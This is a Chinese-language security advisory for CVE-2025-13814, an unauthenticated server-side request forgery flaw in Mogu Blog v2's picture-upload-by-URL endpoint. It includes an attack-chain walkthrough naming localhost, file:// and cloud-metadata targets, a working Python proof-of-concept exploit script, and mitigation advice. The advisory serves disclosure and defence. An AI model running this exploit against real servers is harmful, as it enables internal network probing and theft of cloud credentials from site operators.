CVE-2025-13814 Mogu Blog v2 SSRF服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-13814

漏洞类型

服务器端请求伪造(SSRF)

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

moxi159753 Mogu Blog v2

漏洞概述

CVE-2025-13814是moxi159753 Mogu Blog v2中存在的一个服务器端请求伪造（SSRF）安全漏洞。该漏洞存在于LocalFileServiceImpl类的uploadPictureByUrl函数中，攻击者可以通过访问/file/uploadPicsByUrl端点进行利用。漏洞源于应用程序在获取远程图片时未对用户提供的URL进行充分验证，导致攻击者可以诱导服务器向任意内部或外部资源发起请求。此漏洞CVSS评分为7.3，属于高危级别，攻击复杂度低，无需认证和用户交互即可发起攻击。攻击者可利用此漏洞探测内网服务、访问云元数据、读取本地文件或对内部服务发起攻击。漏洞发现者已向厂商通报但未获得回应，且相关利用代码已公开披露。

技术细节

该漏洞位于Mogu Blog v2的LocalFileServiceImpl.uploadPictureByUrl方法中。攻击者通过向/file/uploadPicsByUrl端点发送特制的请求，在URL参数中注入恶意地址。当服务器处理该请求时，会使用Java的URLConnection或类似机制去获取攻击者指定的资源，而不考虑目标地址的合法性。攻击者可以利用file://、http://localhost、http://127.0.0.1等协议访问本地服务，或指向内网IP段进行端口扫描和服务探测。在云环境中，还可能通过http://169.254.169.254/访问云实例元数据服务获取敏感凭证。漏洞利用的关键在于服务器会执行攻击者指定的URL请求，并将响应内容返回给攻击者，从而实现端口探测、文件读取或内部服务交互等操作。

攻击链分析

STEP 1

步骤1

攻击者识别目标Mogu Blog v2实例，发现/file/uploadPicsByUrl端点

STEP 2

步骤2

构造包含恶意URL的POST请求，URL指向内部服务（如localhost、云元数据端点等）

STEP 3

步骤3

服务器端uploadPictureByUrl函数接收请求，未经验证直接发起HTTP请求到攻击者指定地址

STEP 4

步骤4

攻击者接收服务器返回的内部服务响应内容，实现内网探测、敏感信息获取或进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13814 SSRF PoC for Mogu Blog v2
# Target: /file/uploadPicsByUrl endpoint

def ssrf_poc(target_url, internal_target):
    """
    Exploit SSRF vulnerability to request internal resources
    target_url: Base URL of vulnerable Mogu Blog instance
    internal_target: Internal URL to target (e.g., http://localhost:8080, http://169.254.169.254/)
    """
    endpoint = f"{target_url.rstrip('/')}/file/uploadPicsByUrl"
    
    # Payload with malicious URL
    payload = {
        "url": internal_target
    }
    
    try:
        print(f"[*] Sending SSRF payload to {endpoint}")
        print(f"[*] Target internal resource: {internal_target}")
        
        response = requests.post(endpoint, data=payload, timeout=10)
        
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        print(f"[+] Response Preview:\n{response.text[:500]}")
        
        return response
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <internal_target>")
        print(f"Example: python {sys.argv[0]} http://target.com http://127.0.0.1:8080")
        sys.exit(1)
    
    target = sys.argv[1]
    internal = sys.argv[2]
    ssrf_poc(target, internal)

影响范围

Mogu Blog v2 <= 5.2

防御指南

临时缓解措施

在应用层对所有外部传入的URL参数进行严格过滤和验证，只允许白名单内的图片托管域名；配置Web应用防火墙（WAF）规则阻断对内网地址的请求；限制服务器出站请求的范围和目标；如暂时无法升级，可临时禁用/file/uploadPicsByUrl端点或添加认证保护。